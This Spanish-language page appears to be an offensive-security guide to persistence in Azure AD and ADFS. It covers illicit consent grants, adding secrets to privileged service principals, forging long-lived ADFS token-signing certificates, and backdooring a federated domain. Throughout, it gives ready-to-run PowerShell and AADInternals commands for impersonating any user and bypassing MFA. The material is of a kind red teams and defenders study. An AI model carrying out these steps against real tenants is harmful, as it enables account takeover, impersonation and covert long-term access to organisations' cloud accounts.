Concesión de Consentimiento Ilícito

Por defecto, cualquier usuario puede registrar una aplicación en Azure AD. Por lo tanto, puedes registrar una aplicación (solo para el inquilino objetivo) que requiera permisos de alto impacto con consentimiento de administrador (aprobarlo si eres el administrador) - como enviar correos en nombre de un usuario, gestión de roles, etc. Esto nos permitirá realizar ataques de phishing que serían muy fructíferos en caso de éxito.

Además, también podrías aceptar esa aplicación con tu usuario como una forma de mantener acceso sobre ella.

Aplicaciones y Principales de Servicio

Con privilegios de Administrador de Aplicaciones, GA o un rol personalizado con permisos de actualización de credenciales de microsoft.directory/aplicaciones, podemos agregar credenciales (secreto o certificado) a una aplicación existente.

Es posible apuntar a una aplicación con permisos elevados o agregar una nueva aplicación con permisos elevados.

Un rol interesante para agregar a la aplicación sería el rol de administrador de autenticación privilegiada ya que permite restablecer la contraseña de los Administradores Globales.

Esta técnica también permite burlar la MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• Para la autenticación basada en certificados

Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federación - Certificado de Firma de Token

Con privilegios de DA en AD local, es posible crear e importar nuevos certificados de firma de token y certificados de descifrado de token que tengan una validez muy larga. Esto nos permitirá iniciar sesión como cualquier usuario cuyo ImmutableID conozcamos.

Ejecute el siguiente comando como DA en el servidor(es) ADFS para crear nuevos certificados (contraseña predeterminada 'AADInternals'), agregarlos a ADFS, deshabilitar el cambio automático y reiniciar el servicio:

New-AADIntADFSSelfSignedCertificates

Luego, actualiza la información del certificado con Azure AD:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Federación - Dominio de confianza

Con privilegios de GA en un inquilino, es posible agregar un nuevo dominio (debe ser verificado), configurar su tipo de autenticación como Federado y configurar el dominio para confiar en un certificado específico (any.sts en el comando a continuación) y emisor:

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Referencias

• https://aadinternalsbackdoor.azurewebsites.net/